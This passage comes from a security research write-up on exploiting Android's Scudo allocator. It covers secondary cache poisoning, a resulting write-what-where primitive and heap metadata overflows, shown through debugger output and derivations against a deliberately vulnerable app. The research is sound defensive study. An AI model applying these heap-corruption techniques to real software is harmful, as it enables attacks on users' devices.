As can be seen from the fields LargeBlock::Header::MapBase = -1 and LargeBlock::Header::MapSize = -1, we definitely get our chunk back. There cannot be any other chunk with such a chunk header, because this would imply that mmap returned -1, which is not a valid user - space address on Android. Also observe that the last cached large chunk is retrieved first . Hence, if we called malloc next, then our fake chunk would be considered first!

Still, there is something off:

  1. LargeBlock::Header::Prev = 0x00007bac40c76fc0, which is not our chunk.
  2. LargeBlock::Header::Next = 0x0000000000000000, so its the last element in InUseChunks
  3. LargeBlock::Header::CommitBase = 0x00007babf29407f0 = 0x7babf29407b0 + 0x40, where 0x7babf29407b0 was the address of the large header before calling free. But we can see that the CommitBase remained the same and also that the newly “allocated” chunk is now located at 0x00007babf29407f0, which is the CommitBase value of our fake chunk (technically, this could be a coincidence, because 0x7babf29407f0 = 0x7babf29407b0 + 0x40, which is just shifted by the size of all header altogether including padding. The argument against that is that the secondary by itself should have no reason to return a chunk that is located on the stack, i.e. overlapping with our buffer).

As is the case with primary poisoning , the contents have not been cleared:

gef➤  x/4gx $rax
    0x7babf2940830:	0x4242424242424242	0x4242424242424242
    0x7babf2940840:	0x4242424242424242	0x4242424242424242

which again allows for distinguishing fake chunk creation and preinitialization of memory. When attempting to preinitialize a data structure, we have to take the shift of 0x40 into account (we will see why the shift is there later).


Similar to primary poisoning , there are some pitfalls with secondary cache poisoning , which will be discussed in this section.

One Secondary to rule ’em all

Observe that when allocating memory from the secondary via malloc(<large size>) , there is only one instance of the secondary that actually handles these allocations (as opposed to the primary, which may “change” depending on the outcome of getTSDAndLock . Actually the primary itself does not change, but the cache that is based on the primary. I will use primary and a cache that comes from the primary interchangably, because the Primary is not used for any allocations directly).

Considering the empirical observation that the damnvulnerableapp:VulnerableActivity averages to roughly 20 threads per run, it is very likely that other threads will also use the secondary. One particular run shows 25 threads running in parallel:

gef➤  i threads
    Id   Target Id                            Frame 
    1    Thread 16516.16516 "nerableActivity" 0x00007baef80269aa in __epoll_pwait () from
    6    Thread 16516.16521 "Signal Catcher"  0x00007baef80263ea in __rt_sigtimedwait () from
    7    Thread 16516.16522 "perfetto_hprof_" 0x00007baef8025747 in read () from
    8    Thread 16516.16523 "ADB-JDWP Connec" 0x00007baef8026aaa in __ppoll () from
    9    Thread 16516.16524 "Jit thread pool" 0x00007baef7fcddf8 in syscall () from
    10   Thread 16516.16525 "HeapTaskDaemon"  0x00007baef7fcddf8 in syscall () from
    11   Thread 16516.16526 "ReferenceQueueD" 0x00007baef7fcddf8 in syscall () from
    12   Thread 16516.16527 "FinalizerDaemon" 0x00007baef7fcddf8 in syscall () from
    13   Thread 16516.16528 "FinalizerWatchd" 0x00007baef7fcddf8 in syscall () from
    14   Thread 16516.16529 "Binder:16516_1"  0x00007baef80259e7 in __ioctl () from
    15   Thread 16516.16530 "Binder:16516_2"  0x00007baef80259e7 in __ioctl () from
    16   Thread 16516.16533 "Binder:16516_3"  0x00007baef80259e7 in __ioctl () from
    17   Thread 16516.16538 "Profile Saver"   0x00007baef7fcddf8 in syscall () from
    18   Thread 16516.16539 "RenderThread"    0x00007baef80269aa in __epoll_pwait () from
    19   Thread 16516.16542 "pool-2-thread-1" 0x00007baef8026aaa in __ppoll () from
    20   Thread 16516.16544 "hwuiTask0"       0x00007baef7fcddf8 in syscall () from
    21   Thread 16516.16545 "hwuiTask1"       0x00007baef7fcddf8 in syscall () from
    22   Thread 16516.16546 "Binder:16516_3"  0x00007baef7fcddf8 in syscall () from
    23   Thread 16516.16547 "Thread-3"        0x00007baef802656a in recvfrom () from
    * 24   Thread 16516.16548 "Thread-2"        0x00007babf33de9ec in Java_com_damnvulnerableapp_vulnerable_modules_SecondaryFakeModule_free () from
    25   Thread 16516.16562 "Binder:16516_4"  0x00007baef80259e7 in __ioctl () from

As with the primary , our fake chunk may be stolen by another thread, depending on the allocations performed.

Another problem is that if the cache is full and there are not “enough” (4) allocations happening to balance out the congestion of the cache, the cache will be emptied . This basically invalidates all cache entries and unmaps them. Having munmap called on our fake chunk might seem problematic, but it turns out that running munmap(0x0, 0x1) returns successfully…Therefore, setting LargeBlock::Header::MapBase = 0 and LargeBlock::Header::MapSize = 1 at least prevents the app from aborting. Of course, having our fake cache entry stripped from the cache mitigates this attack.

To conclude, Secondary Cache Poisoning is probabilistic just like Primary Poisoning !

Shifted User Data

Recall that our fake chunk returned from calling malloc is located at fake.CommitBase = 0x00007babf29407f0 = 0x7babf29407b0 + 0x40. Therefore, the user data starts at 0x7babf29407b0 + 0x40 + 0x40 = 0x7babf2940830, because of the headers and padding (see example above). At best, we want to show that malloc(size) = fake.CommitBase + 0x40, because this would allow us to precisely control where the fake chunk is located. Observe that there seem to be no limitations on the position of a secondary chunk as opposed to primary chunks , because the LargeBlock::Header::CommitBase is not compacted!

Lets say we successfully called free(buffer + 0x40) and therefore introduced our fake chunk into the secondary cache. Also, assume that the next call of our thread to malloc(fake.CommitSize - 0x40) returns our fake chunk, if available in terms of size and pointer constraints (no other thread can steal it), and that 0x10 | fake.CommitBase and 0x10 | fake.CommitSize (i.e. everything is nicely aligned). We want to prove that these assumptions imply that malloc(fake.CommitSize - 0x40) = fake.CommitBase + 0x40.

First, observe that MapAllocatorCache::store does not change fake.CommitBase and fake.CommitSize. To that end, notice that all accesses to Entry.CommitBase and Entry.CommitSize , are by value and not by reference. Thus, the actual cache entry will contain our chosen fake.CommitBase and fake.CommitSize.

When allocating from the secondary cache, retrieve is called. Based on the assumption that malloc(fake.CommitSize - 0x40) returns our fake chunk if available, we need to show that

  1. the sizes match, s.t. our fake chunk is actually part of the set of chunks that fit our allocation request. Then, by assumption, the fake chunk will be returned.
  2. the CommitBase is somehow modified by a constant.

For the first point, observe that Secondary.deallocate is given the allocation size that is passed to malloc. Therefore, MapAllocatorCache::retrieve is called with Size = fake.CommitSize - 0x40. We also know that fake_entry.CommitSize = fake.CommitSize (we will call the entry representing our fake chunk fake_entry). Hence CommitBase := fake_entry.CommitBase and CommitSize := fake_entry.CommitSize. Then it has to hold that

  1. HeaderPos > CommitBase + CommitSize . This is computed in the following:
    AllocPos  = roundDownTo(CommitBase + CommitSize - Size, Alignment)
            = roundDownTo(CommitBase + CommitSize - (fake.CommitSize - 0x40), Alignment)
            = roundDownTo(CommitBase + CommitSize - (CommitSize - 0x40), Alignment)
            = roundDownTo(CommitBase + 0x40), Alignment)   <-- assumption on 0x10 divides CommitBase
            = CommitBase + 0x40
    HeaderPos = AllocPos - Chunk::getHeaderSize() - LargeBlock::getHeaderSize();
            = (CommitBase + 0x40) - 0x10 - 0x30
            = CommitBase
    Therefore, we check whether CommitBase > CommitBase + CommitSize <=> 0 > CommitSize, which is impossible, as CommitSize is of type uptr = uintptr_t . To be precise, an unsigned comparison will be performed, i.e. for r13 = AllocPos and rsi = CommitBase + CommitSize:
    0x00007baef7fc0dc6 <+182>:	add    r13,0xffffffffffffffc0   // HeaderPos = AllocPos - 0x40
    0x00007baef7fc0dca <+186>:	cmp    r13,rsi  // CommitBase - (CommitBase + CommitSize) = -CommitSize
    0x00007baef7fc0dcd <+189>:	ja     0x7baef7fc0d80   // jump if CF=0 and ZF=0; we DONT want to jump here
    For the above, CF=1 as mathematically CommitSize >= 0. Hence, the fake chunk passes the first check.
  2. HeaderPos < CommitBase || AllocPos > CommitBase + PageSize * MaxUnusedCachePages :
    1. HeaderPos < CommitBase <=> CommitBase < CommitBase is trivially false.
    2. The second condition requires a bit more math:
          AllocPos = CommitBase + 0x40
               > CommitBase + PageSize * MaxUnusedCachePages
      <=> 0x40 > 0x1000 * 4
      which is trivially false.

From now on we may assume that the fake chunk passed all the above tests, which implies that we reach the assignment phase . Luckily, this phase does not modify fake_entry.CommitBase and fake_entry.CommitSize at all. Notice that the pointer to the header that MapAllocatorCache::retrieve returns is HeaderPos , i.e. CommitBase.

Finally, the user data pointer will be computed here (extremely simplified):

return H + LargeBlock::getHeaderSize(); // = fake.CommitBase + 0x30

This is then used to compute the final user pointer Ptr = fake.CommitBase + 0x30 + 0x10 (again extremely simplified, but this is what actually happens when resolving alignment etc.).

Therefore, malloc(fake.CommitSize - 0x40) = fake.CommitBase + 0x40 (btw. this is totally a Write - What - Where condition ).

Neat Little Side Effect

The attentive reader might have noticed that the previous proof, dispite being a mathematical disaster, implies that an attacker can control where the chunk is returned to by setting fake.CommitBase accordingly.

Theoretically speaking, let target_addr be the address we want to write data to. Also, we assume that the cache is not emptied. If the cache is emptied while the fake chunk is cached, munmap will either return an error, which in turn results in an abort, or will unmap a region that is in use, therefore eventually causing a segmentation fault. Thus, the probability of the following attack to succeed decreases with increasing amount of bytes to write!

From malloc(fake.CommitSize - 0x40) = fake.CommitBase + 0x40 we get that the LargeBlock::Header is stored at a chosen fake.CommitBase. As we cannot control the contents of fake.Prev and fake.Next, because they will be overwritten, we have to stick with fake.MapBase and fake.MapSize. It should also be possible to use the fake.CommitSize field, but we will ignore it for now, because it will be modified by a + 0x40, which has to be considered when calling free in order to bypass the checks.

Now, choosing fake.CommitBase = target_addr + offset(LargeBlock::Header::MapBase) = target_addr + 0x20 results in a 16 byte write at target_addr. Of course this is limited by the fact that a thread allocating enough memory to trigger the secondary will try to use the allocated memory (otherwise, why would a thread allocate memory at all?). Therefore, this Write - What - Where condition is constrained by the fact that whereever we write, consecutive memory is most likely overwritten by the allocating thread.

Heap - based Meta Data Overflow

Up to this point, we have only seen fake chunk creation for primary and secondary and a small Write - What - Where condition . Now one might ask: What if there is a buffer overflow into a consecutive chunk?

First, lets agree on focussing on primary allocations. The reason is that secondary allocations will initially be performed via mmap and therefore include a portion of randomness as regards their addresses. Of course, the primary also utilizes randomness to especially make heap - based overflows harder. I.e. the primary shuffles the chunks w.r.t. a class id. This means that for some index i we get that with high probability malloc_i(size) != malloc_i+1(size) - (header_size + padding + size) = malloc_i+1(size) - 0x20.

This leaves us with either trying to attack the randomness (e.g. via side channel attacks) or creating two consecutive fake chunks with the property that one chunk can overflow into the other chunk. As attacks on randomness are pretty hard (i.e. mathematical) this will be postponed and tagged as future work .

Lets assume that we introduced two fake chunks, named first and second, with the following properties:

  1. the fake chunks are of the same size (primary)
  2. there exists an index i s.t. C->Chunks[i] = first and C->Chunks[i+1] = second
  3. there is no interference by other threads
  4. first and second are successive in memory, i.e. addr(first) + 0x20 = addr(second)
  5. there exists functionality in the target app that will allocate both chunks, trigger a buffer overflow from first into second, and second contains “important” information

To be precise, it only really matters that property 5 is given, i.e. we technically do not need property 2. Although the problem that arises is that the functionality that triggers the overflow will have to perform a certain (maybe random) amount of allocations after allocating first until it allocates second, therefore decreasing success probability. Determining the amount of allocations could require restarting the app over and over again with increasing number of allocations, or in the worst case boil down to guessing.

Assuming the above properties, the remaining issue is that overwriting meta data of second in Scudo will abort the app if free(second) is called and there is a checksum mismatch. Therefore, we need to know the pointer of second and a value for Cookie in order to properly compute the checksum. If, however, the goal is to get the overflow into “important” user data (which might even allow to overwrite the .got entry of free), then an attacker will be allowed to overflow with the above assumptions.

Future Work

In this section, unanswered questions and unsolved problems are listed for future work! Either they seemed to hard at first glance or were considered “useless” at that point in time.

  1. Evaluate integer underflow in primary poisoning . It somehow feels like there has to be more that can be done…
  2. Evaluate getBlockBegin . To be precise: how can the Offset field be used? Memory probing??
  3. Attack: Primary fake chunk creation to construct predictable order and locations of primary chunks. I.e. calling free repeatedly for consecutive memory allows to fill up C->Chunks in non - shuffled fashion! Problem: strong assumptions
  4. Evaluate integer underflow caused by calling DoublyLinkedList::remove with X->Next = X->Prev = X. Maybe side channel?? (very unlikely, but would be funny). DoublyLinkedList::Size impacts DoublyLinkedList::empty(), which impacts scudo_malloc_info. Might be useful to confuse programs…
  5. What happens if the quarantine and memory tagging are enabled? How does that impact the proposed attacks?
  6. It seems to be possible to render the secondary cache useless by freeing fake chunks with CommitSize = <size smaller than primary sizes> and CommitBase != nullptr, as we dont have control over the ClassId field for scudo_malloc calls. This could enforce secondary allocations to use mmap and munmap. This might be limited by the fact that the cache can be emptied if it is full.
  7. Evaluate attacks on randomness as regards chunk ordering in the primary. It suffices to know that two chunks in a chunk array are consecutive in terms of array positioning and memory location. Dissolving the entire shuffling of a chunks array would be amazing, but way too much. If we knew that the next to calls to malloc result in two successive chunks in terms of memory location, then we could trigger a behaviour that again triggers a buffer overflow w.r.t. the two chunks. If we only had an oracle that tells us whether the next two calls to malloc return successive chunks in memory, then we could test for this property and if its not given, then perform a (maybe random) sequence of malloc and free calls to “shuffle” the array. Then repeat.


We have seen different kinds of attacks on vulnerabilities that involve Scudo. To be precise, we have seen two types of fake chunk creation, namely Primary Poisoning and Secondary Cache Poisoning , as well as a Write - What - Where condition , which was a side effect of Secondary Cache Poisoning. Finally, heap overflows into chunk meta data have been discussed.

Overall, we can say that with strong enough assumptions, i.e. leak of a pointer and a combined header, and presence of a Scudo - related vulnerability, we can perform similar attacks to those applicable to e.g. dlmalloc. Currently, the main assumption is the leak in order to break the checksum. Further analysis is required to determine whether this leak is a globally minimal assumption, or whether the assumption can be dropped or replaced by a weaker one.